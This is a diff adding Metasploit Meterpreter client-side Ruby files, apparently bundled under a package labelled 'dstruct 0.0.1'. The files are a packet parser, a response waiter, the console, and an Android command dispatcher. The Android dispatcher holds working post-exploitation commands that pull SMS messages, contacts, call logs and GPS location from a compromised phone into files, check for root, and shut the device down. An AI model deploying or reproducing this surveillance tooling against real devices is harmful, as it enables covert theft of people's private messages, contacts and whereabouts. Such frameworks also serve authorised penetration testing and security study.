dstruct 0.0.1

data/lib/rex/post/meterpreter/packet_parser.rb

@@ -0,0 +1,94 @@
+# -*- coding: binary -*-
+
+module Rex
+module Post
+module Meterpreter
+
+###
+#
+# This class is responsible for reading in and decrypting meterpreter
+# packets that arrive on a socket
+#
+###
+class PacketParser
+
+  #
+  # Initializes the packet parser context with an optional cipher.
+  #
+  def initialize(cipher = nil)
+    self.cipher = cipher
+
+    reset
+  end
+
+  #
+  # Resets the parser state so that a new packet can begin being parsed.
+  #
+  def reset
+    self.raw = ''
+    self.hdr_length_left = 8
+    self.payload_length_left = 0
+  end
+
+  #
+  # Reads data from the wire and parse as much of the packet as possible.
+  #
+  def recv(sock)
+    if (self.hdr_length_left > 0)
+      buf = sock.read(self.hdr_length_left)
+
+      if (buf)
+        self.raw << buf
+
+        self.hdr_length_left -= buf.length
+      else
+        raise EOFError
+      end
+
+      # If we've finished reading the header, set the
+      # payload length left to the number of bytes
+      # specified in the length
+      if (self.hdr_length_left == 0)
+        self.payload_length_left = raw.unpack("N")[0] - 8
+      end
+    elsif (self.payload_length_left > 0)
+      buf = sock.read(self.payload_length_left)
+
+      if (buf)
+        self.raw << buf
+
+        self.payload_length_left -= buf.length
+      else
+        raise EOFError
+      end
+    end
+
+    # If we've finished reading the entire packet
+    if ((self.hdr_length_left == 0) &&
+        (self.payload_length_left == 0))
+
+      # Create a typeless packet
+      packet = Packet.new(0)
+
+      # TODO: cipher decryption
+      if (cipher)
+      end
+
+      # Serialize the packet from the raw buffer
+      packet.from_r(self.raw)
+
+      # Reset our state
+      reset
+
+      return packet
+    end
+  end
+
+protected
+  attr_accessor :cipher, :raw, :hdr_length_left, :payload_length_left  # :nodoc:
+
+end
+
+
+end; end; end
+

data/lib/rex/post/meterpreter/packet_response_waiter.rb

@@ -0,0 +1,83 @@
+# -*- coding: binary -*-
+
+require 'timeout'
+require 'thread'
+
+module Rex
+module Post
+module Meterpreter
+
+###
+#
+# This class handles waiting for a response to a given request
+# and the subsequent response association.
+#
+###
+class PacketResponseWaiter
+
+  #
+  # Initializes a response waiter instance for the supplied request
+  # identifier.
+  #
+  def initialize(rid, completion_routine = nil, completion_param = nil)
+    self.rid      = rid.dup
+    self.response = nil
+
+    if (completion_routine)
+      self.completion_routine = completion_routine
+      self.completion_param   = completion_param
+    else
+      self.done  = false
+    end
+  end
+
+  #
+  # Checks to see if this waiter instance is waiting for the supplied
+  # packet based on its request identifier.
+  #
+  def waiting_for?(packet)
+    return (packet.rid == rid)
+  end
+
+  #
+  # Notifies the waiter that the supplied response packet has arrived.
+  #
+  def notify(response)
+    self.response = response
+
+    if (self.completion_routine)
+      self.completion_routine.call(response, self.completion_param)
+    else
+      self.done = true
+    end
+  end
+
+  #
+  # Waits for a given time interval for the response packet to arrive.
+  # If the interval is -1 we can wait forever.
+  #
+  def wait(interval)
+    if( interval and interval == -1 )
+      while(not self.done)
+        ::IO.select(nil, nil, nil, 0.1)
+      end
+    else
+      begin
+        Timeout.timeout(interval) {
+          while(not self.done)
+            ::IO.select(nil, nil, nil, 0.1)
+          end
+        }
+      rescue Timeout::Error
+        self.response = nil
+      end
+    end
+    return self.response
+  end
+
+  attr_accessor :rid, :done, :response # :nodoc:
+  attr_accessor :completion_routine, :completion_param # :nodoc:
+end
+
+end; end; end
+

data/lib/rex/post/meterpreter/ui/console.rb

@@ -0,0 +1,142 @@
+# -*- coding: binary -*-
+require 'rex/ui'
+require 'rex/post/meterpreter'
+require 'rex/logging'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# This class provides a shell driven interface to the meterpreter client API.
+#
+###
+class Console
+
+  include Rex::Ui::Text::DispatcherShell
+
+  # Dispatchers
+  require 'rex/post/meterpreter/ui/console/interactive_channel'
+  require 'rex/post/meterpreter/ui/console/command_dispatcher'
+  require 'rex/post/meterpreter/ui/console/command_dispatcher/core'
+
+  #
+  # Initialize the meterpreter console.
+  #
+  def initialize(client)
+    if (Rex::Compat.is_windows())
+      super("meterpreter")
+    else
+      super("%undmeterpreter%clr")
+    end
+
+    # The meterpreter client context
+    self.client = client
+
+    # Queued commands array
+    self.commands = []
+
+    # Point the input/output handles elsewhere
+    reset_ui
+
+    enstack_dispatcher(Console::CommandDispatcher::Core)
+
+    # Set up logging to whatever logsink 'core' is using
+    if ! $dispatcher['meterpreter']
+      $dispatcher['meterpreter'] = $dispatcher['core']
+    end
+  end
+
+  #
+  # Called when someone wants to interact with the meterpreter client.  It's
+  # assumed that init_ui has been called prior.
+  #
+  def interact(&block)
+    init_tab_complete
+
+    # Run queued commands
+    commands.delete_if { |ent|
+      run_single(ent)
+      true
+    }
+
+    # Run the interactive loop
+    run { |line|
+      # Run the command
+      run_single(line)
+
+      # If a block was supplied, call it, otherwise return false
+      if (block)
+        block.call
+      else
+        false
+      end
+    }
+  end
+
+  #
+  # Interacts with the supplied channel.
+  #
+  def interact_with_channel(channel)
+    channel.extend(InteractiveChannel) unless (channel.kind_of?(InteractiveChannel) == true)
+    channel.on_command_proc = self.on_command_proc if self.on_command_proc
+    channel.on_print_proc   = self.on_print_proc if self.on_print_proc
+
+    channel.interact(input, output)
+    channel.reset_ui
+  end
+
+  #
+  # Queues a command to be run when the interactive loop is entered.
+  #
+  def queue_cmd(cmd)
+    self.commands << cmd
+  end
+
+  #
+  # Runs the specified command wrapper in something to catch meterpreter
+  # exceptions.
+  #
+  def run_command(dispatcher, method, arguments)
+    begin
+      super
+    rescue Timeout::Error
+      log_error("Operation timed out.")
+    rescue RequestError => info
+      log_error(info.to_s)
+    rescue Rex::AddressInUse => e
+      log_error(e.message)
+    rescue ::Errno::EPIPE, ::OpenSSL::SSL::SSLError, ::IOError
+      self.client.kill
+    rescue  ::Exception => e
+      log_error("Error running command #{method}: #{e.class} #{e}")
+    end
+  end
+
+  #
+  # Logs that an error occurred and persists the callstack.
+  #
+  def log_error(msg)
+    print_error(msg)
+
+    elog(msg, 'meterpreter')
+
+    dlog("Call stack:\n#{$@.join("\n")}", 'meterpreter')
+  end
+
+  attr_reader :client # :nodoc:
+
+protected
+
+  attr_writer :client # :nodoc:
+  attr_accessor :commands # :nodoc:
+
+end
+
+end
+end
+end
+end
+

data/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb

@@ -0,0 +1,86 @@
+# -*- coding: binary -*-
+require 'rex/logging'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# Base class for all command dispatchers within the meterpreter console user
+# interface.
+#
+###
+module Console::CommandDispatcher
+
+  include Rex::Ui::Text::DispatcherShell::CommandDispatcher
+
+  #
+  # The hash of file names to class names after a module has already been
+  # loaded once on the client side.
+  #
+  @@file_hash = {}
+
+  #
+  # Checks the file name to hash association to see if the module being
+  # requested has already been loaded once.
+  #
+  def self.check_hash(name)
+    @@file_hash[name]
+  end
+
+  #
+  # Sets the file path to class name association for future reference.
+  #
+  def self.set_hash(name, klass)
+    @@file_hash[name] = klass
+  end
+
+  def initialize(shell)
+    @msf_loaded = nil
+    super
+  end
+
+  #
+  # Returns the meterpreter client context.
+  #
+  def client
+    shell.client
+  end
+
+  #
+  # Returns true if the client has a framework object.
+  #
+  # Used for firing framework session events
+  #
+  def msf_loaded?
+    return @msf_loaded unless @msf_loaded.nil?
+    # if we get here we must not have initialized yet
+
+    if client.framework
+      # We have a framework instance so the msf libraries should be
+      # available.  Load up the ones we're going to use
+      require 'msf/base/serializer/readable_text'
+    end
+    @msf_loaded = !!(client.framework)
+    @msf_loaded
+  end
+
+  #
+  # Log that an error occurred.
+  #
+  def log_error(msg)
+    print_error(msg)
+
+    elog(msg, 'meterpreter')
+
+    dlog("Call stack:\n#{$@.join("\n")}", 'meterpreter')
+  end
+
+end
+
+end
+end
+end
+end

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb

@@ -0,0 +1,383 @@
+# -*- coding: binary -*-
+require 'rex/post/meterpreter'
+require 'msf/core/auxiliary/report'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+# Android extension - set of commands to be executed on android devices.
+# extension by Anwar Mohamed (@anwarelmakrahy)
+###
+
+class Console::CommandDispatcher::Android
+  include Console::CommandDispatcher
+  include Msf::Auxiliary::Report
+
+  #
+  # List of supported commands.
+  #
+  def commands
+    all = {
+      'dump_sms'          => 'Get sms messages',
+      'dump_contacts'     => 'Get contacts list',
+      'geolocate'         => 'Get current lat-long using geolocation',
+      'dump_calllog'      => 'Get call log',
+      'check_root'        => 'Check if device is rooted',
+      'device_shutdown'   => 'Shutdown device'
+    }
+
+    reqs = {
+      'dump_sms'        => [ 'dump_sms' ],
+      'dump_contacts'   => [ 'dump_contacts' ],
+      'geolocate'       => [ 'geolocate' ],
+      'dump_calllog'    => [ 'dump_calllog' ],
+      'check_root'      => [ 'check_root' ],
+      'device_shutdown' => [ 'device_shutdown']
+    }
+
+    # Ensure any requirements of the command are met
+    all.delete_if do |cmd, desc|
+      reqs[cmd].any? { |req| not client.commands.include?(req) }
+    end
+  end
+
+  def cmd_device_shutdown(*args)
+
+    seconds = 0
+    device_shutdown_opts = Rex::Parser::Arguments.new(
+      '-h' => [ false, 'Help Banner' ],
+      '-t' => [ false, 'Shutdown after n seconds']
+    )
+
+    device_shutdown_opts.parse(args) { | opt, idx, val |
+      case opt
+      when '-h'
+        print_line('Usage: device_shutdown [options]')
+        print_line('Shutdown device.')
+        print_line(device_shutdown_opts.usage)
+        return
+      when '-t'
+        seconds = val.to_i
+      end
+    }
+
+    res = client.android.device_shutdown(seconds)
+
+    if res
+      print_status("Device will shutdown #{seconds > 0 ?('after ' + seconds + ' seconds'):'now'}")
+    else
+      print_error('Device shutdown failed')
+    end
+  end
+  
+  def cmd_dump_sms(*args)
+
+    path = "sms_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt"
+    dump_sms_opts = Rex::Parser::Arguments.new(
+        '-h' => [ false, 'Help Banner' ],
+        '-o' => [ false, 'Output path for sms list']
+    )
+
+    dump_sms_opts.parse(args) { | opt, idx, val |
+      case opt
+      when '-h'
+        print_line('Usage: dump_sms [options]')
+        print_line('Get sms messages.')
+        print_line(dump_sms_opts.usage)
+        return
+      when '-o'
+        path = val
+      end
+    }
+
+    smsList = []
+    smsList = client.android.dump_sms
+
+    if smsList.count > 0
+      print_status("Fetching #{smsList.count} sms #{smsList.count == 1? 'message': 'messages'}")
+      begin
+        info = client.sys.config.sysinfo
+
+        data = ""
+        data << "\n=====================\n"
+        data << "[+] Sms messages dump\n"
+        data << "=====================\n\n"
+
+        time = Time.new
+        data << "Date: #{time.inspect}\n"
+        data << "OS: #{info['OS']}\n"
+        data << "Remote IP: #{client.sock.peerhost}\n"
+        data << "Remote Port: #{client.sock.peerport}\n\n"
+
+        smsList.each_with_index { |a, index|
+
+          data << "##{index.to_i + 1}\n"
+
+          type = 'Unknown'
+          if a['type'] == '1'
+            type = 'Incoming'
+          elsif a['type'] == '2'
+            type = 'Outgoing'
+          end
+
+          status = 'Unknown'
+          if a['status'] == '-1'
+            status = 'NOT_RECEIVED'
+          elsif a['status'] == '1'
+            status = 'SME_UNABLE_TO_CONFIRM'
+          elsif a['status'] == '0'
+            status = 'SUCCESS'
+          elsif a['status'] == '64'
+            status = 'MASK_PERMANENT_ERROR'
+          elsif a['status'] == '32'
+            status = 'MASK_TEMPORARY_ERROR'
+          elsif a['status'] == '2'
+            status = 'SMS_REPLACED_BY_SC'
+          end
+
+          data << "Type\t: #{type}\n"
+
+          time = a['date'].to_i / 1000
+          time = Time.at(time)
+
+          data << "Date\t: #{time.strftime('%Y-%m-%d %H:%M:%S')}\n"
+          data << "Address\t: #{a['address']}\n"
+          data << "Status\t: #{status}\n"
+          data << "Message\t: #{a['body']}\n\n"
+        }
+
+        ::File.write(path, data)
+        print_status("Sms #{smsList.count == 1? 'message': 'messages'} saved to: #{path}")
+
+        return true
+      rescue
+        print_error("Error getting messages: #{$!}")
+        return false
+      end
+    else
+      print_status('No sms messages were found!')
+      return false
+    end
+  end
+
+
+  def cmd_dump_contacts(*args)
+
+    path = "contacts_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt"
+    dump_contacts_opts = Rex::Parser::Arguments.new(
+
+      '-h' => [ false, 'Help Banner' ],
+      '-o' => [ false, 'Output path for contacts list']
+
+    )
+
+    dump_contacts_opts.parse(args) { | opt, idx, val |
+      case opt
+      when '-h'
+        print_line('Usage: dump_contacts [options]')
+        print_line('Get contacts list.')
+        print_line(dump_contacts_opts.usage)
+        return
+      when '-o'
+        path = val
+      end
+    }
+
+    contactList = []
+    contactList = client.android.dump_contacts
+
+    if contactList.count > 0
+      print_status("Fetching #{contactList.count} #{contactList.count == 1? 'contact': 'contacts'} into list")
+      begin
+        info = client.sys.config.sysinfo
+
+        data = ""
+        data << "\n======================\n"
+        data << "[+] Contacts list dump\n"
+        data << "======================\n\n"
+
+        time = Time.new
+        data << "Date: #{time.inspect}\n"
+        data << "OS: #{info['OS']}\n"
+        data << "Remote IP: #{client.sock.peerhost}\n"
+        data << "Remote Port: #{client.sock.peerport}\n\n"
+
+        contactList.each_with_index { |c, index|
+
+          data << "##{index.to_i + 1}\n"
+          data << "Name\t: #{c['name']}\n"
+
+          if c['number'].count > 0
+            (c['number']).each { |n|
+              data << "Number\t: #{n}\n"
+            }
+          end
+
+          if c['email'].count > 0
+            (c['email']).each { |n|
+              data << "Email\t: #{n}\n"
+            }
+          end
+
+          data << "\n"
+        }
+  
+        ::File.write(path, data)
+        print_status("Contacts list saved to: #{path}")
+
+        return true
+      rescue
+        print_error("Error getting contacts list: #{$!}")
+        return false
+      end
+    else
+      print_status('No contacts were found!')
+      return false
+    end
+  end
+
+  def cmd_geolocate(*args)
+
+    generate_map = false
+    geolocate_opts = Rex::Parser::Arguments.new(
+
+      '-h' => [ false, 'Help Banner' ],
+      '-g' => [ false, 'Generate map using google-maps']
+
+    )
+
+    geolocate_opts.parse(args) { | opt, idx, val |
+      case opt
+      when '-h'
+        print_line('Usage: geolocate [options]')
+        print_line('Get current location using geolocation.')
+        print_line(geolocate_opts.usage)
+        return
+      when '-g'
+        generate_map = true
+      end
+    }
+
+    geo = client.android.geolocate
+
+    print_status('Current Location:')
+    print_line("\tLatitude:  #{geo[0]['lat']}")
+    print_line("\tLongitude: #{geo[0]['long']}\n")
+    print_line("To get the address: https://maps.googleapis.com/maps/api/geocode/json?latlng=#{geo[0]['lat'].to_f},#{geo[0]['long'].to_f}&sensor=true\n")
+
+    if generate_map
+      link = "https://maps.google.com/maps?q=#{geo[0]['lat'].to_f},#{geo[0]['long'].to_f}"
+      print_status("Generated map on google-maps:")
+      print_status(link)
+      Rex::Compat.open_browser(link)
+    end
+
+  end
+
+  def cmd_dump_calllog(*args)
+
+    path = "calllog_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt"
+    dump_calllog_opts = Rex::Parser::Arguments.new(
+
+      '-h' => [ false, 'Help Banner' ],
+      '-o' => [ false, 'Output path for call log']
+
+    )
+
+    dump_calllog_opts.parse(args) { | opt, idx, val |
+      case opt
+      when '-h'
+        print_line('Usage: dump_calllog [options]')
+        print_line('Get call log.')
+        print_line(dump_calllog_opts.usage)
+        return
+      when '-o'
+        path = val
+      end
+    }
+
+    log = client.android.dump_calllog
+
+    if log.count > 0
+      print_status("Fetching #{log.count} #{log.count == 1? 'entry': 'entries'}")
+      begin
+        info = client.sys.config.sysinfo
+
+        data = ""
+        data << "\n=================\n"
+        data << "[+] Call log dump\n"
+        data << "=================\n\n"
+
+        time = Time.new
+        data << "Date: #{time.inspect}\n"
+        data << "OS: #{info['OS']}\n"
+        data << "Remote IP: #{client.sock.peerhost}\n"
+        data << "Remote Port: #{client.sock.peerport}\n\n"
+
+        log.each_with_index { |a, index|
+
+          data << "##{index.to_i + 1}\n"
+
+          data << "Number\t: #{a['number']}\n"
+          data << "Name\t: #{a['name']}\n"
+          data << "Date\t: #{a['date']}\n"
+          data << "Type\t: #{a['type']}\n"
+          data << "Duration: #{a['duration']}\n\n"
+        }
+
+        ::File.write(path, data)
+        print_status("Call log saved to #{path}")
+
+        return true
+      rescue
+        print_error("Error getting call log: #{$!}")
+        return false
+      end
+    else
+      print_status('No call log entries were found!')
+      return false
+    end
+  end
+
+
+  def cmd_check_root(*args)
+
+    check_root_opts = Rex::Parser::Arguments.new(
+      '-h' => [ false, 'Help Banner' ]
+    )
+
+    check_root_opts.parse(args) { | opt, idx, val |
+      case opt
+      when '-h'
+        print_line('Usage: check_root [options]')
+        print_line('Check if device is rooted.')
+        print_line(check_root_opts.usage)
+        return
+      end
+    }
+
+    is_rooted = client.android.check_root
+
+    if is_rooted
+      print_good('Device is rooted')
+    elsif
+      print_status('Device is not rooted')
+    end
+  end
+
+  #
+  # Name for this dispatcher
+  #
+  def name
+    'Android'
+  end
+
+end
+
+end
+end
+end
+end